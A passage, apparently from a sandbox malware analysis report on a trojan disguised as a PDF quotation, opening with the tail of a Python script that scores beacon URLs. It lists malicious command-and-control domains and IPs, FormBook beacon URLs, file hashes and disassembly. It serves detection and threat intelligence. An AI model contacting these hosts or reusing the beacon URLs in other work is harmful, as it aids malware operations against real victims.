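            values.setdefault(name, set()).add(value)
    constant = {k: next(iter(v)) for k, v in values.items() if len(v) == 1}
    varying = [k for k in names if k not in constant]
    return {
        "param_names": {k for k, c in names.items() if c == n},
        "constant": constant,
        "varying": varying,
        "min_blob_len": min(len(v) for k in varying for v in values[k]),
    }


def score(url, sig):
    """0 = no match, 1 = beacon-shaped path only, 2 = full parameter match."""
    _, path, params = split_query(url)
    if not PATH_RE.match(path):
        return 0
    if not params:
        return 1
    got = dict(params)
    if set(got) != sig["param_names"]:
        return 1
    if any(got[k] != v for k, v in sig["constant"].items()):
        return 1
    if any(len(got[k]) < sig["min_blob_len"] for k in sig["varying"]):
        return 1
    return 2


def iocs(urls):
    """Deduplicated host list for blocking, independent of the path."""
    return sorted({split_query(u)[0] for u in urls})


if __name__ == "__main__":
    sig = learn_signature(REPORT_URLS)
    print("constant parameters:", sig["constant"], "varying:", sig["varying"])
    for u in REPORT_URLS + BENIGN_URLS:
        print(score(u, sig), u[:60])
    print("hosts:", iocs(REPORT_URLS))
```

A score of 2 is a strong hit on this campaign (parameter names and the tD_ token are campaign-specific); a score of 1 is only the generic four-character-directory shape and needs the host list or another signal before it is actionable.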
URLs found in memory dumps:
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://kb.fastpanel.direct/troubleshoot/ | RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000043CA000.00000004.10000000.00040000.00000000.sdmp; RMActivate_isv.exe, 0000000B.00000002.3138038480.0000000006420000.00000004.00000800.00020000.00000000.sdmp; xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.000000000369A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.bt.cn/?from=404 | RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000040A6000.00000004.10000000.00040000.00000000.sdmp; xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003376000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 00000010.00000002.2000496930.0000000028E66000.00000004.80000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.mdpc7.top | xvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | RMActivate_isv.exe, 0000000B.00000002.3135956729.0000000004BA4000.00000004.10000000.00040000.00000000.sdmp; xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003E74000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
Contacted IPs (flag column omitted):
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.tals.xyz | United States | 16509 | AMAZON-02US | true
161.97.142.144 | www.070002018.xyz | United States | 51167 | CONTABODE | true
47.76.213.197 | www.ytsd88.top | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | true
20.2.36.112 | mmd.dnsmmd.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
176.117.73.104 | www.bionanosolutions.info | Ukraine | 50643 | LURENET-ASUA | true
203.161.46.205 | www.startvin.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
176.32.38.130 | www.acc888ommodate.xyz | Russian Federation | 51659 | ASBAXETRU | true
107.167.84.42 | cssa.auction | United States | 53755 | IOFLOODUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557571
Start date and time: 2024-11-18 13:10:57 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Quotation request -30112024_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/8
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 65
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Domains excluded from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. View the PCAPs for the complete data
• VT rate limit hit for: Quotation request -30112024_pdf.exe
                                                                  No simulations
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  13.248.169.48Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.wajf.net/dkz5/
                                                                  rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                  • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                  dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                  • www.extrem.tech/ikn1/
                                                                  Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sonoscan.org/ew98/
                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • www.hopeisa.live/v0jl/
                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                  • www.layerzero.cfd/8f5m/
                                                                  rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.reviewpro.shop/aclh/
                                                                  FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                  • www.fitlook.shop/34uy/
                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM
                                                                  Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sonoscan.org/ew98/
                                                                  161.97.142.144DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003794.xyz/mpp6/
                                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                  • www.030002350.xyz/wrcq/
                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003452.xyz/7nfi/
                                                                  AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002059.xyz/er88/
                                                                  ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003582.xyz/7zm7/
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002128.xyz/knx2/
                                                                  56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/o2wj/
                                                                  H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/l9k5/
                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002304.xyz/jkxr/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  mmd.dnsmmd.comItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                  • 20.2.36.112
                                                                  Match: VODAFONE-TRANSIT-ASVodafoneNZLtdNZ
                                                                  Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  pennicle.txt.ps1 | malicious | LummaC Stealer | 47.79.48.182
                                                                  https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.html | malicious | Unknown | 47.79.48.182
                                                                  https://sos-at-vie-1.exo.io/bucketrack/dir62/final/prove-not-robot-check.html | malicious | CAPTCHA Scam ClickFix | 47.79.48.182
                                                                  meerkat.mips.elf | malicious | Mirai | 47.76.235.18
                                                                  botnet.m68k.elf | malicious | Mirai, Moobot | 49.224.236.63
                                                                  speedtest-cli.arm5.elf | malicious | Mirai | 118.92.187.4
                                                                  xX1k6Ghe8s.elf | malicious | Mirai | 47.76.171.133
                                                                  arm5.elf | malicious | Mirai | 118.95.51.127
                                                                  bin.arm.elf | malicious | Mirai | 121.75.97.174
                                                                  drivers-v1.ps1 | malicious | LummaC | 47.79.48.189
                                                                  Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
                                                                  Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  file.exe | malicious | LummaC | 13.107.246.45
                                                                  http://login.nojustgive.com/ueAQYUzz | malicious | HTMLPhisher | 20.189.173.13
                                                                  Benefits_Update_2024.pdf | malicious | Unknown | 23.101.59.196
                                                                  file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 13.89.179.9
                                                                  Benefits_Update_2024.pdf | malicious | Unknown | 23.101.59.196
                                                                  file.exe | malicious | LummaC | 13.107.246.45
                                                                  https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDF | malicious | Unknown | 13.107.246.45
                                                                  I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg | malicious | Mint Stealer | 52.109.28.47
                                                                  file.exe | malicious | LummaC | 13.107.246.45
                                                                  https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235 | malicious | Unknown | 13.73.248.4
                                                                  Match: AMAZON-02US
                                                                  Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  https://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gif | malicious | Unknown | 44.230.175.247
                                                                  900092839283982.exe | malicious | DBatLoader, VIP Keylogger | 52.216.214.9
                                                                  https://shorturl.at/cQwea | malicious | Unknown | 13.35.58.119
                                                                  file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 3.170.115.43
                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
                                                                  harm5.elf | malicious | Unknown | 54.171.230.55
                                                                  http://inscrit.es/ | malicious | Unknown | 52.24.205.146
                                                                  http://inscrit.es/ | malicious | Unknown | 54.244.144.214
                                                                  http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962 | malicious | Unknown | 35.76.5.47
                                                                  Match: CONTABODE
                                                                  Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  4c9ebxnhQk.exe | malicious | Unknown | 80.241.214.102
                                                                  BankInformation.vbe | malicious | AgentTesla | 144.91.79.54
                                                                  BlgAsBdkiD.exe | malicious | FormBook | 161.97.142.144
                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 161.97.142.144
                                                                  PO-DC13112024_pdf.vbs | malicious | Unknown | 161.97.142.144
                                                                  https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca | malicious | Captcha Phish | 207.180.225.113
                                                                  Ref#2073306.vbe | malicious | MicroClip | 144.91.79.54
                                                                  Arrival Notice.exe | malicious | FormBook | 161.97.142.144
                                                                  75A0VTo3z9.exe | malicious | Emotet | 5.189.178.202
                                                                  SWIFTCOPY202973783.vbe | malicious | AgentTesla | 144.91.79.54
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\RMActivate_isv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:modified
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1215420383712111
                                                                  Encrypted:false
                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):286720
                                                                  Entropy (8bit):7.995046245800451
                                                                  Encrypted:true
                                                                  SSDEEP:6144:uNXGV4dF2FIBEVrex68/do6m0YvasscvQ64QJsw5i:uNVAk68/dSsssc9rM
                                                                  MD5:5F7DFFB148379894337CF6F62DE296B3
                                                                  SHA1:D653510B08B089DDF1AEF492B414436A587D2B82
                                                                  SHA-256:591D3A0D4A3A93EDEA64D1270BAFBB6887096E0539B0009DD01EC770064017DE
                                                                  SHA-512:729951CC46CC15A3CF13A04553C9309959187DA6DAE28BCB6A209C1B90710000DCB69D1B104ABE63DDF152D2AE054CF9294655522945001577E09B9F6EB2552B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...M[WRUWQDS..NW.DE0XHNGsEJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBS.MXW\J._D.[.o.T.... '4.58))029m;6<;<%d17r<";d,^x....(%"+l^YG|WRUSQDS+SG.h$".e()..%-.T...w80.O...o25.M...8/..Z&"{.%.TMXWRUSQ..RR.VTD.a..NG3EJFNB.TOY\S^SQ.WRRNWUDE0X.ZG3EZFNB3PMXW.USADSRPNWSDE0XHNG5EJFNBSTM8SRUQQDSRRNUU..0XXNG#EJFNRST]XWRUSQTSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3Ed2+:'TMX..QSQTSRR.SUDU0XHNG3EJFNBSTMxWR5SQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRR
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14442
                                                                  Entropy (8bit):7.636644896371412
                                                                  Encrypted:false
                                                                  SSDEEP:384:nTYzRyE1ZC/UQ9FIntJ3ObN8+zg4z0/FZy/PjMDHL:nAL1RQ9Fc36NhgEy+XjMDHL
                                                                  MD5:DBBBDC9512FD01DC5B53896A961711E5
                                                                  SHA1:461B4D4F09C2DFD545C5DE4C3EE8BAA813BD2B40
                                                                  SHA-256:4ACD93AF7ED747B6ED606C340A06D13EE439CABC17A8849C4DAF9B2146FCC836
                                                                  SHA-512:A5CF5011975D070C126BA582CB5E910FBF0A4EDDF29BCA8334250C7D73062AC4F37585137D9D5E2AE5A31E48BF195457812D4C40680519B17D1AA3DEDBA07546
                                                                  Malicious:false
                                                                  Preview:EA06..0..[-w9..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):143378
                                                                  Entropy (8bit):2.993068678381446
                                                                  Encrypted:false
                                                                  SSDEEP:1536:lC6Hbc8Z/kCXWqb64Micg9+VotMclKrng51U:10ejtm
                                                                  MD5:B697D9071D910E9FD4A7AD4305BFA855
                                                                  SHA1:01D4484834A7DE44A3BE3470722AB2154E733572
                                                                  SHA-256:027DCEDD9B993A616FECC8241F765B8B10A4AEAC601B704760E3AF7E4100EA3C
                                                                  SHA-512:E40DC04D28EB9C0769FAF21F21B64AAB2BC9D340D081438D521FFC1A27D9BA4CF03DF60006477535371DBFD9249B12437F461F31310669781394AF0B71B839B3
                                                                  Malicious:false
                                                                  Preview:
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):286720
                                                                  Entropy (8bit):7.995046245800451
                                                                  Encrypted:true
                                                                  SSDEEP:6144:uNXGV4dF2FIBEVrex68/do6m0YvasscvQ64QJsw5i:uNVAk68/dSsssc9rM
                                                                  MD5:5F7DFFB148379894337CF6F62DE296B3
                                                                  SHA1:D653510B08B089DDF1AEF492B414436A587D2B82
                                                                  SHA-256:591D3A0D4A3A93EDEA64D1270BAFBB6887096E0539B0009DD01EC770064017DE
                                                                  SHA-512:729951CC46CC15A3CF13A04553C9309959187DA6DAE28BCB6A209C1B90710000DCB69D1B104ABE63DDF152D2AE054CF9294655522945001577E09B9F6EB2552B
                                                                  Malicious:false
                                                                  Preview:...M[WRUWQDS..NW.DE0XHNGsEJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBS.MXW\J._D.[.o.T.... '4.58))029m;6<;<%d17r<";d,^x....(%"+l^YG|WRUSQDS+SG.h$".e()..%-.T...w80.O...o25.M...8/..Z&"{.%.TMXWRUSQ..RR.VTD.a..NG3EJFNB.TOY\S^SQ.WRRNWUDE0X.ZG3EZFNB3PMXW.USADSRPNWSDE0XHNG5EJFNBSTM8SRUQQDSRRNUU..0XXNG#EJFNRST]XWRUSQTSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3Ed2+:'TMX..QSQTSRR.SUDU0XHNG3EJFNBSTMxWR5SQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRR
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.217859133980473
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Quotation request -30112024_pdf.exe
                                                                  File size:970'257 bytes
                                                                  MD5:8a44b6f23ceba13203e4dc3fb33aea3c
                                                                  SHA1:1fd1641755f1df2d11f42e5176ebcf2c7684661a
                                                                  SHA256:2166b87c378747df98dcbbb089b0d3a21cf5631e999e68447e804c4b48d25efb
                                                                  SHA512:979d33893e066231d3f4cee669560a273b6ae2a8ffb5ea6988b2176909284e42e15e42c6816219710d603c1a466b531d4d171e7f3065cd67a1a8359fb111783e
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCKUJFf4C6iewesl:7JZoQrbTFZY1iaCKUTRpnl
                                                                  TLSH:C625D022F5D68036C2B323B19E7EF76A963D79360336D19727C82E315EA05416B29733
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                  Icon Hash:1733312925935517
                                                                  Entrypoint:0x4165c1
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                  Instruction
                                                                  call 00007F5780D8CFCBh
                                                                  jmp 00007F5780D83E3Eh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F5780D83FBAh
                                                                  cmp edi, eax
                                                                  jc 00007F5780D84156h
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F5780D83FCEh
                                                                  cmp dword ptr [004A9724h], 00000000h
                                                                  je 00007F5780D83FC5h
                                                                  push edi
                                                                  push esi
                                                                  and edi, 0Fh
                                                                  and esi, 0Fh
                                                                  cmp edi, esi
                                                                  pop esi
                                                                  pop edi
                                                                  jne 00007F5780D83FB7h
                                                                  jmp 00007F5780D84392h
                                                                  test edi, 00000003h
                                                                  jne 00007F5780D83FC6h
                                                                  shr ecx, 02h
                                                                  and edx, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F5780D83FDBh
                                                                  rep movsd
                                                                  jmp dword ptr [00416740h+edx*4]
                                                                  mov eax, edi
                                                                  mov edx, 00000003h
                                                                  sub ecx, 04h
                                                                  jc 00007F5780D83FBEh
                                                                  and eax, 03h
                                                                  add ecx, eax
                                                                  jmp dword ptr [00416654h+eax*4]
                                                                  jmp dword ptr [00416750h+ecx*4]
                                                                  nop
                                                                  jmp dword ptr [004166D4h+ecx*4]
                                                                  nop
                                                                  inc cx
                                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                                  inc cx
                                                                  add byte ptr [ebx], ah
                                                                  ror dword ptr [edx-75F877FAh], 1
                                                                  inc esi
                                                                  add dword ptr [eax+468A0147h], ecx
                                                                  add al, cl
                                                                  jmp 00007F57831FC7B7h
                                                                  add esi, 03h
                                                                  add edi, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007F5780D83F7Eh
                                                                  rep movsd
                                                                  jmp dword ptr [00000000h+edx*4]
                                                                  Programming Language:
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [C++] VS2010 SP1 build 40219
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219
                                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
